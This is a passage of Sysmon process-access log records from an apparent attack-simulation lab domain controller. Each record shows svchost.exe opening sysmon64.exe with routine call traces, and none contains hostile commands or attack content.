C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:32.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:32","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2297,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:32.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 